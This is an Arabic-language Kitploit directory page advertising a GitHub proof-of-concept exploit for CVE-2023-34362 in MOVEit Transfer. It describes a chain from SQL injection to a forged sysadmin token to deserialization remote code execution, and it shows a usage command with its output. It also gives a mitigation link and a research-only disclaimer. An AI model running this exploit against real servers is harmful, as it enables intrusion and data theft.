Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2023-34362 — POC لثغرة CVE-2023-34362 التي تؤثر على MOVEit Transfer | Kitploit
أدوات/GitHubGitHub/malwareman007/cve-2023-34362
توليد الحمولةتحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويباختبار الاختراق
GitHubmalwareman007/cve-2023-34362

CVE-2023-34362

POC لثغرة CVE-2023-34362 التي تؤثر على MOVEit Transfer

عرض المستودع
102منذ 3 سنواتلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

CVE-2023-34362

POC لثغرة CVE-2023-34362 التي تؤثر على MOVEit Transfer

التحليل الفني

يمكن العثور على تحليل فني للسبب الجذري للثغرة على المدونة:

الملخص

  • يستغل هذا الـ POC حقن SQL للحصول على رمز وصول لواجهة برمجة التطبيقات (API) بصلاحيات مسؤول النظام، ثم يستخدم هذا الوصول لاستغلال استدعاء إلغاء التسلسل (deserialization) لتحقيق تنفيذ التعليمات البرمجية عن بُعد (RCE).

  • يحتاج هذا الـ POC إلى الوصول إلى نقطة نهاية لمزوّد الهوية (Identity Provider) تستضيف شهادات RS256 مناسبة تُستخدم لتزوير رموز مستخدم عشوائية - بشكل افتراضي، يستخدم هذا الـ POC نقطة نهاية IDP الخاصة بنا المستضافة في AWS.

  • سيقوم الاستغلال افتراضيًا بكتابة ملف إلى C:\Windows\Temp\message.txt. يمكن إنشاء حمولات بديلة باستخدام مشروع ysoserial.net.

الاستخدام

root@kitploit:~
python CVE-2023-34362.py https://127.0.0.1
[*] Getting sysadmin access token
[*] Got access token
[*] Getting FolderID
[*] Got FolderID: 963611079
[*] Starting file upload
[*] Got FileID: 965943963
[*] Injecting the payload
[*] Payload injected
[*] Triggering payload via resume call
[+] Triggered the payload!
[*] Deleting uploaded file

إجراءات التخفيف

قم بالتحديث إلى أحدث إصدار أو خفّف من المخاطر باتباع التعليمات الواردة في الاستشارة الأمنية الصادرة عن Progress

  • https://community.progress.com/s/article/MOVEit-Transfer-Critical-Vulnerability-31May2023

إخلاء المسؤولية

تم إنشاء هذا البرنامج لأغراض البحث الأكاديمي وتطوير تقنيات دفاعية فعّالة فقط، وليس المقصود استخدامه لمهاجمة الأنظمة إلا عند التصريح بذلك صراحةً. لا يتحمل القائمون على المشروع أي مسؤولية عن سوء استخدام البرنامج. استخدمه بمسؤولية.

تنزيل الأداة